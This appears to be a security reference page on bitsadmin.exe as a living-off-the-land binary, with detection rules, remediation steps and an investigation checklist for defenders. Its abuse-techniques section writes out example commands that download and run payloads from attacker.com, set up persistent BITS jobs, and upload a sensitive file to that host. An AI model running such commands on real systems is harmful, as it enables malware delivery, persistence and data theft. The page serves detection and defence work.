anavem.
Critical RiskWindowsLegitimateCommonly Abused
bitsadmin.exeSYSTEM UTILITY

bitsadmin.exe - BITS Admin LOLBin Security Analysis

bitsadmin.exe is the **Background Intelligent Transfer Service** command-line tool and a **notorious LOLBin**. Attackers abuse it for **stealthy file downloads** that persist across reboots, **execution of downloaded payloads**, and **data exfiltration**. BITS jobs are difficult to detect and survive system restarts.

Risk Summary

CRITICAL priority for SOC triage. bitsadmin.exe is a top-tier LOLBin for persistent downloads and execution. Any /transfer, /create, or /addfile commands require **immediate investigation**. BITS jobs persist across reboots making this particularly dangerous.

Overview

What is bitsadmin.exe?

bitsadmin.exe manages Windows Background Intelligent Transfer Service (BITS) jobs.

Legitimate Functions

BITS Management:

  • Download Windows updates
  • Transfer large files
  • Resume interrupted downloads
  • Background throttled transfers

Why It's Dangerous

LOLBin Capabilities:

  • Stealthy file downloads
  • Persistence across reboots
  • Execute downloaded files
  • Difficult to detect

Security Significance

  • Trusted Binary: Signed Microsoft tool
  • Persistence: Jobs survive restarts
  • Evasion: Traffic appears as BITS
  • Execution: Can run downloaded files

Normal Behavior

Normal Behavior

Expected Process State

PropertyExpected Value
PathC:\Windows\System32\bitsadmin.exe
Parentcmd.exe, powershell.exe (admin)
UserAdministrator
ContextWindows Update operations

Legitimate Usage

:: Check BITS jobs (legitimate)
bitsadmin /list /allusers

:: Windows Update context only

Frequency

Direct bitsadmin usage is rare - Windows typically uses PowerShell or API.

Common Locations

C:\Windows\System32\bitsadmin.exeC:\Windows\SysWOW64\bitsadmin.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE (Very Rare)

Command:     bitsadmin /list
             bitsadmin /info
Context:     System administration
Frequency:   Rare

SUSPICIOUS (High Confidence)

Command:     bitsadmin /transfer /download http://...
             bitsadmin /create /addfile /resume
             bitsadmin /SetNotifyCmdLine
Context:     Any non-IT user
Frequency:   Any

Dangerous Parameters

ParameterRiskDescription
/transferCRITICALDownload file
/addfileCRITICALAdd file to job
/SetNotifyCmdLineCRITICALExecute on completion
/resumeHIGHStart download
/createHIGHCreate new job

Abuse Techniques

Attack Techniques

Technique #1: File Download (T1197)

Download Malware via BITS:

bitsadmin /transfer job /download /priority high http://attacker.com/mal.exe C:\mal.exe

Persistent Download Job:

bitsadmin /create downloadjob
bitsadmin /addfile downloadjob http://attacker.com/payload.exe C:\payload.exe
bitsadmin /resume downloadjob
bitsadmin /complete downloadjob

Technique #2: Execute After Download (T1059)

bitsadmin /SetNotifyCmdLine job C:\payload.exe
bitsadmin /resume job

Technique #3: Persistence (T1197)

BITS jobs persist across reboots - malware can create job that downloads and executes on every startup.

Technique #4: Data Exfiltration (T1048)

bitsadmin /transfer exfil /upload http://attacker.com/upload C:\sensitive.zip

Detection Guidance

Detection Strategies

Priority #1: Any Download Command (CRITICAL)

Sigma Rule:

title: Bitsadmin Download
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\bitsadmin.exe'
    CommandLine|contains:
      - '/transfer'
      - '/addfile'
      - 'http'
  condition: selection
level: critical

Priority #2: Execution Setup

Process = "bitsadmin.exe" AND
CommandLine CONTAINS "/SetNotifyCmdLine"
→ ALERT: CRITICAL - Execution on download completion

Priority #3: List All Jobs

bitsadmin /list /allusers /verbose
# Review for suspicious jobs

Priority #4: PowerShell Alternative

Get-BitsTransfer -AllUsers | Where-Object {
    $_.TransferType -eq 'Download' -and
    $_.JobState -ne 'Transferred'
} | Format-List

Remediation Steps

Protection and Remediation

Defense: Monitor BITS Jobs

# Scheduled task to audit BITS
Get-BitsTransfer -AllUsers | Export-Csv "bits_audit.csv"

Defense: Application Control

Restrict bitsadmin.exe to administrators.

If Compromise Suspected

  1. List all BITS jobs
  2. Cancel suspicious jobs
  3. Identify downloaded files
  4. Trace execution chain
  5. Remove persistence
bitsadmin /cancel <job>
bitsadmin /reset /allusers

Investigation Checklist

Investigation Checklist

  • List all BITS jobs with /list /allusers
  • Review job URLs and destinations
  • Check for /SetNotifyCmdLine
  • Identify downloaded files
  • Check if downloads executed
  • Review command line history
  • Cancel malicious jobs
  • Hunt for persistence

MITRE ATT&CK Techniques

T1197T1105T1059T1048

Related Windows Files

EXCEL.EXEhigh

EXCEL.EXE is **Microsoft Excel**, the spreadsheet application and a **primary malware delivery vecto...

Commonly Abused
everything.exelow

Everything is a fast file search utility by Voidtools. Attackers may use it for rapid file discovery...

expressvpn.exemedium

ExpressVPN is a commercial VPN service client. While legitimate for privacy, it can be abused for C2...

hitmanpro.exelow

HitmanPro is a portable anti-malware scanner from Sophos. It uses cloud-based behavioral analysis to...

Last verified: January 18, 2026